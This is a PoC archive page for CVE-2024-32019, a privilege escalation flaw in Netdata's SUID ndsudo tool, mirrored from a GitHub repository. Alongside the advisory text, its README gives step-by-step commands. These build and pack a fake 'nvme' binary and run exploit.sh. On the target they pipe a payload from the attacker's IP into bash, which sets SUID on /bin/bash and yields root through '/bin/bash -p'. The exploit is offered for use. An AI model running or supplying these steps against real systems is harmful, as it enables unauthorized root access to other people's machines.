Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/C0deInBlack/CVE-2024-32019-poc
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
Netdata ndsudo PoC
Readme
# CVE-2024-32019-poc
Netdata ndsudo PoC

Build the binary:
```bash
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
```
Run the bash script:
```
bash exploit.sh <YOUR IP>
```
In target machine run in a writable directory:
```bash
curl http://<YOUT IP>:8000/payload.sh | bash
```
It will automatically download the nvme binary, export the path, run ndsudo and add **SUID** to `/bin/bash`.
Probably you need to change the ndsudo path in `exploit.sh`

To escalate privileges just run:
```bash
/bin/bash -p
```

## Note:
The exploit is based in https://github.com/AzureADTrent/CVE-2024-32019-POC, when I tested it, I had the error:
```bash
execve: Exec format error
```
That's why I decided to create mine with Go.
File Snapshot

 [4.0K]  /data/pocs/3af6e4f84154514e4cb607f20dd177141053f72f
├── [ 302]  exploit.sh
├── [ 34K]  LICENSE
├── [ 201]  poc.go
└── [ 712]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →